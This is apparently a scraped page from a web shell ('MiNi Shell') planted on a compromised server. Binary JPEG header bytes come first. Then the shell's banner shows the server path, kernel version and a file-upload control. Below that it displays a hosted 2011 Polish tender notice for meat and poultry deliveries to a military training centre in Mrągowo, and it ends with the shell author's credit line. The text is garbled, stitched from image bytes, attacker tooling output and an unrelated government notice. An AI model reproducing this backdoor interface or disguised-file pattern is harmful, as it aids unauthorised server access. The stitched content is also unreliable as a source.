JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111230/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111230/444170-N-2011.html

<p class="kh_header"><b>Mrągowo: Dostawa produktów zwierzęcych, mięsa i produktów mięsnych</b><br>
<b>Numer ogłoszenia: 444170 - 2011; data zamieszczenia: 30.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojskowy Ośrodek Szkoleniowo-Kondycyjny Mrągowo , ul. Półwysep 4-Wiatrów 1, 11-700 Mrągowo, woj. warmińsko-mazurskie, tel. 0-89 7410101, 7410110, faks 0-89 7410125.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.woszk.mragowo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Wojskowa Jednostka Budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa produktów zwierzęcych, mięsa i produktów mięsnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia w zakresie zadania nr 1 dotyczy dostawy mięsa wołowego i wieprzowego oraz wędlin wolowych i wieprzowych.
Sukcesywna dostawa mięsa (wieprzowego, wołowego) oraz wędlin (z wieprzowiny, wołowiny,) do WOSZK w Mrągowie. 

Lp.	Nazwa produktu	Jm	Ilość w roku	Wymagania jakościowe
1.		udziec wołowy b/k	kg	629,00	PN-88/A-82003:1988
2.		schab wieprzowy b/k	kg	800,00	PN-88/A-82002:1986
3.		karkówka wieprzowa b/k	kg	1400,00	PN-88/A-82002:1986
4.		żeberka wieprzowe	kg	410,00	PN-88/A-82002:1986
5.		golonka wieprzowa tylna	kg	420,00	PN-88/A-82002:1986
6.		wieprzowina-boczek świeży	kg	380,00	PN-88/A-82002:1986
7.		wątroba wieprzowa	kg	75,00	PN-86/A-82004:1986
8.		ozory wieprzowe	kg	111,00	PN-86/A-82004:1986
9.		flaki wołowe	kg	410,00	PN-86/A-82004:1986
10.		baleron	kg	220,00	PN-A-82032:2005
11.		Kiełbasa krakowska parzona	kg	105,00	PN-A-82025:2001
12.		kiełbasa krakowska sucha	kg	105,00	PN-A-82025:2001
13.		serdelki	kg	180,00	PN-A-82007:1996
14.		polędwica sopocka	kg	133,00	PN-A-82031
15.		wędzonka myśliwska	kg	122,00	PN-A-82033:2005
16.		wędzonka krotoszyńska	kg	90,00	PN-A-82033:2005
17.		ogonówka wędzona	kg	155,00	PN-A-82033:2005
18.		kiełbasa szynkowa wieprzowa	kg	120,00	PN-A-82007:1996
19.		kiełbasa podwawelska	kg	100,00	PN-A-82007:1996
20.		kiełbasa podlaska specjalna	kg	300,00	PN-A-82007:1996
21.		kiełbasa zwyczajna	kg	60,00	PN-A-82007:1996
22.		kiełbasa śląska	kg	60,00	PN-A-82007:1996
23.		kiełbasa żywiecka	kg	120,00	PN-A-82028:2002

24.		kiełbasa jałowcowa	kg	40,00	PN-A-82007:1996
25.		kiełbasa mazurska	kg	85,00	PN-A-82007:1996
26.		kiełbasa myśliwska	kg	85,00	PN-A-82007:1996
27.		kielbasa toruńska	kg	105,00	PN-A-82007:1996
28.		kiełbasa biała	kg	150,00	PN-A-82007:1996
29.		kiełbasa szynkowa wołowa specjalna	kg	70,00	PN-A-82007:1996
30.		szynka konserwowa	kg	120,00	PN-A-82007:1996
31.		schab pieczony	kg	67,00	PN-A-82007:1996
32.		karkówka pieczona	kg	105,00	PN-A-82007:1996
33.		boczek wędzony	kg	50,00	PN-A-82007:1996
34.		rolada z boczku	kg	95,00	PN-A-82007:1996
35.		pasztet pieczony	kg	34,00	PN-A-82007:1996
36.		kaszanka gryczana	kg	64,00	PN-A-82007:1996
37.		szynka wędzona 	kg	220,00	PN-A-86526:1995
38.		salami	kg	24,00	PN-A-82007:1996
39.		golonka konserwowa	kg	75,00	PN-A-82007:1996
40.		Szynka prasowana	kg	140,00	PN-A-82007:1996
41.		Szynka chłopska	kg	32,00	PN-A-82007:1996
42.		Salceson ozorkowy	kg	420,00	PN-A-82007:1996
43.		Szynka mielona	kg	80,00	PN-A-82007:1996
44.		łopatka pieczona	kg	50,00	PN-A-82007:1996
45.		rolada schabowa	kg	216,00	PN-A-82007:1996


Przedmiot zamówienia w zakresie zadania nr 2 dotyczy  dostawy mięsa i wędlin drobiowych.


Lp. 	Nazwa produktu	Jm	Ilość w roku	Wymagania jakościowe
1.		noga z kurczaka mrożona	kg	1160,00	PN-88/A-82002
2.		filet z piersi kurczaka mrozony	kg	1112,00	PN-88/A-82002
3.		wątroba z kurczaka mrożona	kg	125,00	PN-A-86523:1995
4.		porcje rosołowe z kurczaka	kg	125,00	PN-A-86526:1995
5.		żołądki drobiowe świeże	kg	280,00	PN-A-86523:1995
6.		filet z piersi kurczaka wędzony	kg	121,00	PN-A-86526:1995
7.		polędwica drobiowa	kg	99,00	PN-A-86526:1995
8.		szynka drobiowa	kg	40,00	PN-A-86526:1995
9.		mozaika drobiowa	kg	38,00	PN-A-86526:1995
10.		Kiełbasa szynkowa drobiowa	kg	46,00	PN-A-86526:1995
11.		kiełbasa z indyka	kg	60,00	PN-A-86526:1995.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza możliwość udzielenia zamówień uzupełniających stanowiących nie więcej niż 20 % zadania podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Decyzję Państwowego Inspektora Sanitarnego zezwalająca na handel</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.woszk.mragowo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nazwa zamawiającego 	WOSzK Mrągowo
Adres zamawiającego 	Półwysep Czterech Wiatrów
Kod Miejscowość 	11-700 Mrągowo.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.01.2012 godzina 10:00, miejsce: WOSzK Mrągowo
Półwysep Czterech Wiatrów
11-700 Mrągowo
Kancelaria Jawna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> dostawa mięsa wołowego i wieprzowego oraz wędlin wołowych i wieprzowych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa produktu	Jm	Ilość w roku	Wymagania jakościowe
1.		udziec wołowy b/k	kg	629,00	PN-88/A-82003:1988
2.		schab wieprzowy b/k	kg	800,00	PN-88/A-82002:1986
3.		karkówka wieprzowa b/k	kg	1400,00	PN-88/A-82002:1986
4.		żeberka wieprzowe	kg	410,00	PN-88/A-82002:1986
5.		golonka wieprzowa tylna	kg	420,00	PN-88/A-82002:1986
6.		wieprzowina-boczek świeży	kg	380,00	PN-88/A-82002:1986
7.		wątroba wieprzowa	kg	75,00	PN-86/A-82004:1986
8.		ozory wieprzowe	kg	111,00	PN-86/A-82004:1986
9.		flaki wołowe	kg	410,00	PN-86/A-82004:1986
10.		baleron	kg	220,00	PN-A-82032:2005
11.		Kiełbasa krakowska parzona	kg	105,00	PN-A-82025:2001
12.		kiełbasa krakowska sucha	kg	105,00	PN-A-82025:2001
13.		serdelki	kg	180,00	PN-A-82007:1996
14.		polędwica sopocka	kg	133,00	PN-A-82031
15.		wędzonka myśliwska	kg	122,00	PN-A-82033:2005
16.		wędzonka krotoszyńska	kg	90,00	PN-A-82033:2005
17.		ogonówka wędzona	kg	155,00	PN-A-82033:2005
18.		kiełbasa szynkowa wieprzowa	kg	120,00	PN-A-82007:1996
19.		kiełbasa podwawelska	kg	100,00	PN-A-82007:1996
20.		kiełbasa podlaska specjalna	kg	300,00	PN-A-82007:1996
21.		kiełbasa zwyczajna	kg	60,00	PN-A-82007:1996
22.		kiełbasa śląska	kg	60,00	PN-A-82007:1996
23.		kiełbasa żywiecka	kg	120,00	PN-A-82028:2002

24.		kiełbasa jałowcowa	kg	40,00	PN-A-82007:1996
25.		kiełbasa mazurska	kg	85,00	PN-A-82007:1996
26.		kiełbasa myśliwska	kg	85,00	PN-A-82007:1996
27.		kielbasa toruńska	kg	105,00	PN-A-82007:1996
28.		kiełbasa biała	kg	150,00	PN-A-82007:1996
29.		kiełbasa szynkowa wołowa specjalna	kg	70,00	PN-A-82007:1996
30.		szynka konserwowa	kg	120,00	PN-A-82007:1996
31.		schab pieczony	kg	67,00	PN-A-82007:1996
32.		karkówka pieczona	kg	105,00	PN-A-82007:1996
33.		boczek wędzony	kg	50,00	PN-A-82007:1996
34.		rolada z boczku	kg	95,00	PN-A-82007:1996
35.		pasztet pieczony	kg	34,00	PN-A-82007:1996
36.		kaszanka gryczana	kg	64,00	PN-A-82007:1996
37.		szynka wędzona 	kg	220,00	PN-A-86526:1995
38.		salami	kg	24,00	PN-A-82007:1996
39.		golonka konserwowa	kg	75,00	PN-A-82007:1996
40.		Szynka prasowana	kg	140,00	PN-A-82007:1996
41.		Szynka chłopska	kg	32,00	PN-A-82007:1996
42.		Salceson ozorkowy	kg	420,00	PN-A-82007:1996
43.		Szynka mielona	kg	80,00	PN-A-82007:1996
44.		łopatka pieczona	kg	50,00	PN-A-82007:1996
45.		rolada schabowa	kg	216,00	PN-A-82007:1996.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> dostawa mięsa i wędlin drobiowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp. 	Nazwa produktu	Jm	Ilość w roku	Wymagania jakościowe
1.		noga z kurczaka mrożona	kg	1160,00	PN-88/A-82002
2.		filet z piersi kurczaka mrozony	kg	1112,00	PN-88/A-82002
3.		wątroba z kurczaka mrożona	kg	125,00	PN-A-86523:1995
4.		porcje rosołowe z kurczaka	kg	125,00	PN-A-86526:1995
5.		żołądki drobiowe świeże	kg	280,00	PN-A-86523:1995
6.		filet z piersi kurczaka wędzony	kg	121,00	PN-A-86526:1995
7.		polędwica drobiowa	kg	99,00	PN-A-86526:1995
8.		szynka drobiowa	kg	40,00	PN-A-86526:1995
9.		mozaika drobiowa	kg	38,00	PN-A-86526:1995
10.		Kiełbasa szynkowa drobiowa	kg	46,00	PN-A-86526:1995
11.		kiełbasa z indyka	kg	60,00	PN-A-86526:1995.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com